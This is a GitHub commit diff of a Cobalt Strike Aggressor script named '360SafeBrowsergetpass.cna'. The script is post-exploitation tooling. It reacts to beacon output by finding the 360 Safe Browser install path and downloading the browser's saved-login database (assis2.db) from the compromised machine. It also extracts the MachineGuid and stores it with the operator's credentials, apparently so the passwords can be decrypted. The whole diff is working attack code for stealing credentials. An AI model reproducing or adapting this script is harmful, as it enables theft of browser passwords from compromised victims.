We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 4a2d6fa commit 01b5f85Copy full SHA for 01b5f85
360SafeBrowsergetpass.cna
@@ -24,22 +24,23 @@ popup beacon_bottom {
24
}
25
26
on beacon_output {
27
- #$res = replace($2, 'received output:\n'.'');
28
- #$res = replace($2, ' \(默认\) REG_SZ '.'');
29
$magicstring = "360se6\\Application\\360se.exe";
30
$magicstring2 = "MachineGuid";
31
32
if ($magicstring isin $2){
33
$length = strlen($2);
34
- $res = substr($2, 40, $length - 32);
+ $last = lindexOf($2, ":");
+ $res = substr($2, $last - 1, $length - 32);
35
$dbPath = "User Data\\Default\\apps\\LoginAssis\\assis2.db";
36
$res = $res . $dbPath;
+
37
bdownload($1, $res);
38
blog($1,"360 SafeBrowser DB Downloading");
39
40
41
if ($magicstring2 isin $2){
42
- $MachineGuid = substr($2, 42, -1);
+ $lasta = lindexOf($2, "\nMachineGuid");
43
+ $MachineGuid = substr($2, $lasta + 26, -1);
44
$beaconHost = beacon_info($1, "host");
45
credential_add($empty,$MachineGuid, $empty, $empty, $beaconHost);
46
blog($1,"MachineGuid Get Success");
0 commit comments